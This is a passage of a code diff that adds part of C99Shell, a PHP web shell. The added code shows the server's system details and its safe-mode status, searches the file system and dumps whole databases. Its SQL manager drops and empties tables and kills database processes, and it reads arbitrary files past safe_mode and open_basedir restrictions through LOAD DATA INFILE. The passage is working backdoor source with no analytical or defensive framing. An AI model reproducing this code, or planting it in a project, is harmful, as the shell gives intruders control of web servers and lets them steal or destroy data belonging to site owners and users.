+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret[err][] = mysql_error();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row[1].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+   if (is_dir($d.$f))
+   {
+    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+    c99fsearch($d.$f);
+   }
+   else
+   {
+    if ($true)
+    {
+     if (!empty($a[text]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+      else {$true = strinstr($a[text],$r);}
+      if ($a[text_not])
+      {
+       if ($true) {$true = false;}
+       else {$true = true;}
+      }
+      if ($true) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($handle);
+}
+}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string","#DD0000"); //#DD0000
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+echo "<b>Directory: </b>";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
+}
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
+   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
+}
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    echo "<option value=\"\">Databases (...)</option>
+";
+    $c = 0;
+    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtpl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    $set = array();
+    $set["sock"] = $sql_sock;
+    $set["db"] = $sql_db;
+    $dump_out = "print";               
+    if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+    elseif ($dump_out == "download")
+    {
+     @ob_clean();
+     header("Content-type: c99shell");
+     header("Content-disposition: attachment; filename=\"".$f."\";"); 
+     $set["print"] = 1;
+     $set["nl2br"] = 1;
+    }
+    $set["file"] = $dump_file;
+    $set["add_drop"] = true;
+    $ret = mysql_dump($set);
+    if ($dump_out == "download") {exit;}
+   }
+   else
+   {
+    $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+    echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+    echo "<tr>";
+    echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+    echo "<td><center><b>Table</b></center></td>";
+    echo "<td><b>Rows</b></td>";
+    echo "<td><b>Type</b></td>";
+    echo "<td><b>Created</b></td>";
+    echo "<td><b>Modified</b></td>";
+    echo "<td><b>Size</b></td>";
+    echo "<td><b>Action</b></td>";
+    echo "</tr>";
+    $i = 0;
+    $tsize = $trows = 0;
+    while ($row = mysql_fetch_array($result, MYSQL_NUM))
+    {
+     $tsize += $row["5"];
+     $trows += $row["5"];
+     $size = view_size($row["5"]);
+     echo "<tr>";
+     echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+     echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+     echo "<td>".$row[3]."</td>";
+     echo "<td>".$row[1]."</td>";
+     echo "<td>".$row[10]."</td>";
+     echo "<td>".$row[11]."</td>";
+     echo "<td>".$size."</td>";
+     echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+     echo "</tr>";
+     $i++;
+    }
+    echo "<tr bgcolor=\"000000\">";
+    echo "<td><center><b>»</b></center></td>";
+    echo "<td><center><b>".$i." table(s)</b></center></td>";
+    echo "<td><b>".$trows."</b></td>";
+    echo "<td>".$row[1]."</td>";
+    echo "<td>".$row[10]."</td>";
+    echo "<td>".$row[11]."</td>";
+    echo "<td><b>".view_size($tsize)."</b></td>";
+    echo "<td></td>";
+    echo "</tr>";
+    echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+    mysql_free_result($result);
+   }
+  }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstat","servervars","processes","getfile");
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+   }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    elseif (($sql_act == "getfile"))
+    {
+     if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+     elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+     else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+     else
+     {
+      for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+      $f = ""; 
+      while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+      if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+      else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+     }
+     mysql_free_result($result);
